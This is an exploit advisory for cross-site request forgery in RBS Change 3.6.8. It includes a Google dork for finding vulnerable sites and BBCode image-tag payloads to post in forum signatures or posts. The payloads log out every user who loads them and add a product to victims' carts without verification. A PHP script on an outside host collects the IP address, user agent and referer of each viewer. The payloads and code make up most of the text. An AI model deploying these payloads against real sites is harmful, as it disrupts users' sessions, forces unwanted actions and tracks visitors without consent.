# Exploit Title: RBS Change Complet Open Source CSRF
# Google Dork: intext:"une réalisation rbs"
# Date: 10/01/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://www.rbschange.fr/
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
# Version: 3.6.8
# Tested on: Linux
HOW TO
======
Just add [img="http://CSRF"][/img] on forum signature or forum posts.
TEST
====
Based on demo.rbschange.fr:
---------------------------
[img="http://server/fr/deconnexion/"][/img]
Will disconnect all users who load the image.
Other example:
--------------
[img="http://www.example.com/log.php"][/img]
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip - $rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND);
?>
To get users ip, user agent, ...
DESCRIPTION
===========
Add a product to a customer basket with an image tag and without any verification.
HOW TO
======
Just add [img="/action/order/AddToCart?shopId=13159&productId=13312"][/img] on forum signature or forum posts.
暂无评论